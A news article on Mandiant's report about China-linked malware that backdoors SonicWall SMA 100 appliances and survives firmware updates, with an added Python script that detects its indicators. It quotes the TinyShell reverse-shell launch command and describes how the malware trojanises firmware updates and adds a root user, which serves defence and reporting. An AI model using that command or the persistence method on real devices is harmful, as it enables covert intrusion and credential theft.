Malware infecting widely used security device survives firmware updates

Threat actors linked to the Chinese government are infecting a widely used security device from SonicWall with malware that remains active even after the device receives firmware updates, researchers said.

SonicWall’s Secure Mobile Access 100 is a secure remote access device that helps organizations securely deploy a remote workforce. Customers use it to grant granular access controls to remote users, provide VPN connections to organizational networks, and define unique profiles for each employee. The access the SMA 100 has to customer networks makes it an attractive target for threat actors.

In 2021, the device was attacked by sophisticated hackers who exploited what was then a zero-day vulnerability. Security appliances from Fortinet and Pulse Secure have come under similar attacks in recent years.

Gaining long-term persistence in networks

On Thursday, security firm Mandiant released a report that said threat actors with suspected ties to China engaged in a campaign to maintain long-term persistence by running malware on unpatched SonicWall SMA appliances. The campaign was notable for the malware’s ability to remain on devices even after downloading new firmware.

“Attackers put significant effort into the stability and persistence of their tools,” wrote Mandiant researchers Daniel Lee, Stephen Eckels and Ben Read. “This allows their access to the network to continue through firmware updates and maintain a position on the network through the SonicWall appliance.”

To achieve this persistence, the malware checks for an available firmware update every 10 seconds. When an update appears, the malware copies the update file for backup, unzips it, mounts it, and then copies the entire malware package into it. The malware also adds a backdoor root user to the mounted file. It then recompresses the file so that the trojanized update is ready for installation.

“The technique is not particularly sophisticated, but shows considerable effort on the attacker’s part to understand the device’s update cycle, then develop and test a method for persistence,” the researchers wrote.

The persistence techniques are consistent with a 2021 attack campaign that used 16 malware families to infect Pulse Secure devices. Mandiant attributed those attacks to multiple threat groups, including ones tracked as UNC2630 and UNC2717, which the company said support “key priorities of the Chinese government.” Mandiant attributed the ongoing attacks against SonicWall SMA 100 customers to a group tracked as UNC4540.

“Over the past few years Chinese attackers have developed multiple exploits and zero-day malware for a variety of networked devices that face the Internet as an avenue for full enterprise intrusion, and the example reported here is part of a recent pattern that Mandiant expects to continue in the short term,” Mandiant researchers wrote in Thursday’s report.

Extremely privileged access

The main purpose of the malware appears to be to steal cryptographically hashed passwords for all logged-in users. It also provides a web shell that the threat actor can use to install new malware.

“Analysis of a compromised device revealed a collection of files that provide the attacker with highly privileged and available access to the device,” the researchers wrote in Thursday’s report. “The malware consists of a series of bash scripts and a single ELF binary identified as a TinyShell variant. The overall behavior of the bash suite shows a detailed understanding of the device and is well-tuned to the system to provide stability and persistence.”

The list of malware components is:

Path                  MD5 hash                            Role
/bin/firewalld        e4117b17e3d14fe64f45750be71dbaa6    Malware main process
/bin/httpsd           2d57bcb8351cf2b57c4fd2d1bb8f862e    TinyShell backdoor
/etc/rc.d/rc.local    559b9ae2a578e1258e80c45a5794c071    Boot persistence for firewalld
/bin/iptabled         8dbf1effa7bc94fc0b9b4ce83dfce2e6    Redundant malware main process
/bin/geoBotnetd       619769d3d40a3c28ec83832ca521f521    Firmware backdoor script
/bin/ifconfig6        fa1bf2e427b2defffd573854c35d4919    Graceful shutdown script

The report continued:

The primary malware entry point is a bash script named firewalld, which executes its main loop once for every file on the system: “…for j in $(ls / -R) do for i in $(ls / -R) do:…” The script is responsible for executing a SQL command to accomplish the credential theft and for executing the other components.

The first function in firewalld launches the TinyShell backdoor httpsd with the command “nohup /bin/httpsd -c -d 5 -m -1 -p 51432 > /dev/null 2>&1 &” if the httpsd process is not already running. This puts TinyShell into reverse-shell mode, instructing it to call out to the aforementioned IP address and port at a specific time and date represented by the -m flag, with a beacon interval defined by the -d flag. The binary has a hardcoded IP address embedded, which is used in reverse-shell mode if the IP address argument is left blank. It also has bind-shell functionality available.
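The three observable traces the report describes, the dropped files in the table above, the backdoor root user injected into the firmware image, and the httpsd launch line quoted here, can each be hunted for with a few lines of code. The following is an added example written for this page, not Mandiant’s or SonicWall’s tooling. It takes a filesystem root (for instance a mounted copy of INITRD.GZ or a forensic image of the appliance), the text of /etc/passwd, and ps output, and reports exact IOC hash matches, unexpected files at IOC paths whose hash differs, extra UID 0 accounts, and processes matching the TinyShell command line. The file contents, passwd entries (the account name “acme”) and ps lines in demo() are constructed samples, not data from the report.

```python
import hashlib
import os
import re
import tempfile

# Path -> MD5 taken from the indicator table above.
IOC_HASHES = {
    "/bin/firewalld": "e4117b17e3d14fe64f45750be71dbaa6",
    "/bin/httpsd": "2d57bcb8351cf2b57c4fd2d1bb8f862e",
    "/etc/rc.d/rc.local": "559b9ae2a578e1258e80c45a5794c071",
    "/bin/iptabled": "8dbf1effa7bc94fc0b9b4ce83dfce2e6",
    "/bin/geoBotnetd": "619769d3d40a3c28ec83832ca521f521",
    "/bin/ifconfig6": "fa1bf2e427b2defffd573854c35d4919",
}
# rc.local legitimately exists on a Linux appliance, so only an exact hash
# match counts there; a file at any other IOC path is suspicious on its own.
ALWAYS_LEGIT = {"/etc/rc.d/rc.local"}

# The launch line quoted in the article: httpsd with the 51432 callback port.
TINYSHELL_RE = re.compile(r"\bhttpsd\b.*-p\s*51432\b")


def md5_file(path):
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_ioc_files(root, iocs=IOC_HASHES):
    """Check a tree (e.g. a mounted firmware image) for the IOC paths.

    Returns {path: "confirmed"} when the MD5 matches the report and
    {path: "suspicious"} when a file sits at an IOC path with a different
    hash (a rebuilt or updated variant)."""
    findings = {}
    for rel, digest in iocs.items():
        p = os.path.join(root, rel.lstrip("/"))
        if not os.path.isfile(p):
            continue
        if md5_file(p) == digest:
            findings[rel] = "confirmed"
        elif rel not in ALWAYS_LEGIT:
            findings[rel] = "suspicious"
    return findings


def rogue_uid0_users(passwd_text):
    """Accounts other than root with UID 0, i.e. an added backdoor root user."""
    rogue = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            rogue.append(fields[0])
    return rogue


def tinyshell_processes(ps_text):
    """Lines of ps output that match the httpsd reverse-shell launch."""
    return [l.strip() for l in ps_text.splitlines() if TINYSHELL_RE.search(l)]


def demo():
    """Build a constructed tree and sample data, then run the checks."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "bin"))
    os.makedirs(os.path.join(root, "etc", "rc.d"))
    # Constructed stand-in at an IOC path; the content is not the malware.
    with open(os.path.join(root, "bin", "geoBotnetd"), "w") as f:
        f.write("#!/bin/sh\n# placeholder\n")
    # Constructed clean rc.local: present on every box, must not be flagged.
    with open(os.path.join(root, "etc", "rc.d", "rc.local"), "w") as f:
        f.write("#!/bin/sh\nexit 0\n")
    # Constructed passwd with a hypothetical backdoor account "acme".
    passwd = ("root:x:0:0:root:/root:/bin/sh\n"
              "acme:x:0:0::/:/bin/sh\n"
              "nobody:x:65534:65534::/:/bin/false\n")
    # Constructed ps output containing the launch line from the article.
    ps = ("  412 root  /usr/sbin/httpd -k start\n"
          " 1337 root  /bin/httpsd -c -d 5 -m -1 -p 51432\n")
    # Second pass with the table keyed to the constructed file's own hash,
    # to show what an exact indicator match looks like.
    exact = dict(IOC_HASHES)
    exact["/bin/geoBotnetd"] = md5_file(os.path.join(root, "bin", "geoBotnetd"))
    return {
        "files": scan_ioc_files(root),
        "files_exact": scan_ioc_files(root, exact),
        "uid0": rogue_uid0_users(passwd),
        "procs": tinyshell_processes(ps),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

On a real appliance image the “suspicious” tier matters as much as the exact hashes: the report notes the attackers rebuild their tools to survive updates, so a file at one of these paths with a fresh hash is still worth pulling, and a UID 0 account that is not root is not something a firmware update should ever introduce.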

The researchers said they did not know what the original infection vector was.

Last week, SonicWall published an advisory urging SMA 100 users to upgrade to version 10.2.1.7 or later. Those versions include hardening such as file integrity monitoring and anomalous process identification. The patch is available from SonicWall. Users should also regularly review logs for signs of compromise, including abnormal logins or unexpected internal traffic originating from the appliance.
